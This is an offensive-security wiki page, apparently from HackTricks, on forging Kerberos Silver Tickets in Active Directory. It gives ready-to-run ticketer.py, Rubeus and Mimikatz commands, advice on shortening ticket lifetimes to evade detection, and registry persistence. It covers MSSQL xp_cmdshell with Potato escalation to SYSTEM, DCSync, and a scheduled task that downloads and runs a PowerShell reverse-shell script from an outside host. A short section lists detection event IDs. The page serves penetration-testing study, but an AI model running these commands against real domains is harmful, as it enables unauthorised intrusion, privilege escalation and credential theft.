silver-ticket.md (11713B)
1 --- 2 title: "Silver Ticket" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/active-directory-methodology/silver-ticket.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/silver-ticket.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Silver Ticket 14 15 ## Silver ticket 16 17 The **Silver Ticket** attack involves the exploitation of service tickets in Active Directory (AD) environments. This method relies on **acquiring the NTLM hash of a service account**, such as a computer account, to forge a Ticket Granting Service (TGS) ticket. With this forged ticket, an attacker can access specific services on the network, **impersonating any user**, typically aiming for administrative privileges. It's emphasized that using AES keys for forging tickets is more secure and less detectable.<sup>[[1]](#references)[[2]](#references)</sup> 18 19 > [!WARNING] 20 > Silver Tickets are less detectable than Golden Tickets because they only require the **hash of the service account**, not the krbtgt account. However, they are limited to the specific service they target. Moreover, just stealing the password of a user. 21 Moreover, if you compromise an **account's password with a SPN** you can use that password to create a Silver Ticket impersonating any user to that service. 22 23 ### Modern Kerberos changes (AES-only domains) 24 25 - Windows updates starting **8 Nov 2022 (KB5021131)** default service tickets to **AES session keys** when possible and are phasing out RC4. DCs are expected to ship with RC4 **disabled by default by mid‑2026**, so relying on NTLM/RC4 hashes for silver tickets increasingly fails with `KRB_AP_ERR_MODIFIED`. Always extract **AES keys** (`aes256-cts-hmac-sha1-96` / `aes128-cts-hmac-sha1-96`) for the target service account.<sup>[[5]](#references)</sup> 26 - If the service account `msDS-SupportedEncryptionTypes` is restricted to AES, you must forge with `/aes256` or `-aesKey`; RC4 (`/rc4` or `-nthash`) will not work even if you hold the NTLM hash.<sup>[[6]](#references)</sup> 27 - gMSA/computer accounts rotate every 30 days; dump the **current AES key** from LSASS, Secretsdump/NTDS, or DCsync before forging. 28 - OPSEC: default ticket lifetime in tools is often **10 years**; set realistic durations (e.g., `-duration 600` minutes) to avoid detection by abnormal lifetimes.<sup>[[6]](#references)</sup> 29 30 For ticket crafting, different tools are employed based on the operating system: 31 32 ### On Linux 33 34 ```bash 35 # Forge with AES instead of RC4 (supports gMSA/machine accounts) 36 python ticketer.py -aesKey <AES256_HEX> -domain-sid <DOMAIN_SID> -domain <DOMAIN> \ 37 -spn <SERVICE_PRINCIPAL_NAME> <USER> 38 # or read key directly from a keytab (useful when only keytab is obtained) 39 python ticketer.py -keytab service.keytab -spn <SPN> -domain <DOMAIN> -domain-sid <DOMAIN_SID> <USER> 40 41 # shorten validity for stealth 42 python ticketer.py -aesKey <AES256_HEX> -domain-sid <DOMAIN_SID> -domain <DOMAIN> \ 43 -spn cifs/<HOST_FQDN> -duration 480 <USER> 44 45 export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache 46 python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass 47 ``` 48 49 ### On Windows 50 51 ```bash 52 # Using Rubeus to request a service ticket and inject (works when you already have a TGT) 53 # /ldap option is used to get domain data automatically 54 rubeus.exe asktgs /user:<USER> [/aes256:<HASH> /aes128:<HASH> /rc4:<HASH>] \ 55 /domain:<DOMAIN> /ldap /service:cifs/<TARGET_FQDN> /ptt /nowrap /printcmd 56 57 # Forging the ticket directly with Mimikatz (silver ticket => /service + /target) 58 mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> \ 59 /aes256:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET> /ptt" 60 # RC4 still works only if the DC and service accept RC4 61 mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> \ 62 /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET> /ptt" 63 64 # Inject an already forged kirbi 65 mimikatz.exe "kerberos::ptt <TICKET_FILE>" 66 .\Rubeus.exe ptt /ticket:<TICKET_FILE> 67 68 # Obtain a shell 69 .\PsExec.exe -accepteula \\<TARGET> cmd 70 ``` 71 72 The CIFS service is highlighted as a common target for accessing the victim's file system, but other services like HOST and RPCSS can also be exploited for tasks and WMI queries. 73 74 ### Example: MSSQL service (MSSQLSvc) + Potato to SYSTEM 75 76 If you have the NTLM hash (or AES key) of a SQL service account (e.g., sqlsvc) you can forge a TGS for the MSSQL SPN and impersonate any user to the SQL service. From there, enable xp_cmdshell to execute commands as the SQL service account. If that token has SeImpersonatePrivilege, chain a Potato to elevate to SYSTEM.<sup>[[4]](#references)</sup> 77 78 ```bash 79 # Forge a silver ticket for MSSQLSvc (AES example) 80 python ticketer.py -aesKey <SQLSVC_AES256> -domain-sid <DOMAIN_SID> -domain <DOMAIN> \ 81 -spn MSSQLSvc/<host.fqdn>:1433 administrator 82 export KRB5CCNAME=$PWD/administrator.ccache 83 84 # Connect to SQL using Kerberos and run commands via xp_cmdshell 85 impacket-mssqlclient -k -no-pass <DOMAIN>/administrator@<host.fqdn>:1433 \ 86 -q "EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'whoami'" 87 ``` 88 89 - If the resulting context has SeImpersonatePrivilege (often true for service accounts), use a Potato variant to get SYSTEM: 90 91 ```bash 92 # On the target host (via xp_cmdshell or interactive), run e.g. PrintSpoofer/GodPotato 93 PrintSpoofer.exe -c "cmd /c whoami" 94 # or 95 GodPotato -cmd "cmd /c whoami" 96 ``` 97 98 More details on abusing MSSQL and enabling xp_cmdshell: 99 100 [Abusing Ad Mssql](/hacktricks/windows-hardening/active-directory-methodology/abusing-ad-mssql) 101 102 Potato techniques overview: 103 104 [Roguepotato And Printspoofer](/hacktricks/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer) 105 106 ## Available Services 107 108 | Service Type | Service Silver Tickets | 109 | ------------------------------------------ | -------------------------------------------------------------------------- | 110 | WMI | <p>HOST</p><p>RPCSS</p> | 111 | PowerShell Remoting | <p>HOST</p><p>HTTP</p><p>Depending on OS also:</p><p>WSMAN</p><p>RPCSS</p> | 112 | WinRM | <p>HOST</p><p>HTTP</p><p>In some occasions you can just ask for: WINRM</p> | 113 | Scheduled Tasks | HOST | 114 | Windows File Share, also psexec | CIFS | 115 | LDAP operations, included DCSync | LDAP | 116 | Windows Remote Server Administration Tools | <p>RPCSS</p><p>LDAP</p><p>CIFS</p> | 117 | Golden Tickets | krbtgt | 118 119 Using **Rubeus** you may **ask for all** these tickets using the parameter: 120 121 - `/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm` 122 123 ### Silver tickets Event IDs 124 125 - 4624: Account Logon 126 - 4634: Account Logoff 127 - 4672: Admin Logon 128 - **No preceding 4768/4769 on the DC** for the same client/service is a common indicator of a forged TGS being presented directly to the service. 129 - Abnormally long ticket lifetime or unexpected encryption type (RC4 when domain enforces AES) also stand out in 4769/4624 data. 130 131 ## Persistence 132 133 To avoid machines from rotating their password every 30 days set `HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1` or you could set `HKLM\SYSTEM\CurrentControlSet\Services\NetLogon\Parameters\MaximumPasswordAge` to a bigger value than 30days to indicate the rotation perdiod when the machines password should be rotated.<sup>[[3]](#references)</sup> 134 135 ## Abusing Service tickets 136 137 In the following examples lets imagine that the ticket is retrieved impersonating the administrator account. 138 139 ### CIFS 140 141 With this ticket you will be able to access the `C$` and `ADMIN$` folder via **SMB** (if they are exposed) and copy files to a part of the remote filesystem just doing something like: 142 143 ```bash 144 dir \\vulnerable.computer\C$ 145 dir \\vulnerable.computer\ADMIN$ 146 copy afile.txt \\vulnerable.computer\C$\Windows\Temp 147 ``` 148 149 You will also be able to obtain a shell inside the host or execute arbitrary commands using **psexec**: 150 151 152 [Psexec And Winexec](/hacktricks/windows-hardening/lateral-movement/psexec-and-winexec) 153 154 ### HOST 155 156 With this permission you can generate scheduled tasks in remote computers and execute arbitrary commands: 157 158 ```bash 159 #Check you have permissions to use schtasks over a remote server 160 schtasks /S some.vuln.pc 161 #Create scheduled task, first for exe execution, second for powershell reverse shell download 162 schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe" 163 schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'" 164 #Check it was successfully created 165 schtasks /query /S some.vuln.pc 166 #Run created schtask now 167 schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName" 168 ``` 169 170 ### HOST + RPCSS 171 172 With these tickets you can **execute WMI in the victim system**: 173 174 ```bash 175 #Check you have enough privileges 176 Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local 177 #Execute code 178 Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand" 179 180 #You can also use wmic 181 wmic remote.computer.local list full /format:list 182 ``` 183 184 Find **more information about wmiexec** in the following page: 185 186 187 [Wmiexec](/hacktricks/windows-hardening/lateral-movement/wmiexec) 188 189 ### HOST + WSMAN (WINRM) 190 191 With winrm access over a computer you can **access it** and even get a PowerShell: 192 193 ```bash 194 New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC 195 ``` 196 197 Check the following page to learn **more ways to connect with a remote host using winrm**: 198 199 200 [Winrm](/hacktricks/windows-hardening/lateral-movement/winrm) 201 202 > [!WARNING] 203 > Note that **winrm must be active and listening** on the remote computer to access it. 204 205 ### LDAP 206 207 With this privilege you can dump the DC database using **DCSync**: 208 209 ```text 210 mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt 211 ``` 212 213 **Learn more about DCSync** in the following page: 214 215 216 [Dcsync](/hacktricks/windows-hardening/active-directory-methodology/dcsync) 217 218 219 ## References 220 221 - [1] [Kerberos: Silver Tickets - ired.team](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets) 222 - [2] [Kerberos (II): How to attack Kerberos? - Tarlogic](https://www.tarlogic.com/blog/how-to-attack-kerberos/) 223 - [3] [Machine Account Password Process - Microsoft Tech Community](https://techcommunity.microsoft.com/blog/askds/machine-account-password-process/396027) 224 - [4] [HTB Sendai – 0xdf: Silver Ticket + Potato path](https://0xdf.gitlab.io/2025/08/28/htb-sendai.html) 225 - [5] [KB5021131 Kerberos hardening & RC4 deprecation](https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d) 226 - [6] [Impacket ticketer.py current options (AES/keytab/duration)](https://kb.offsec.nl/tools/framework/impacket/ticketer-py/)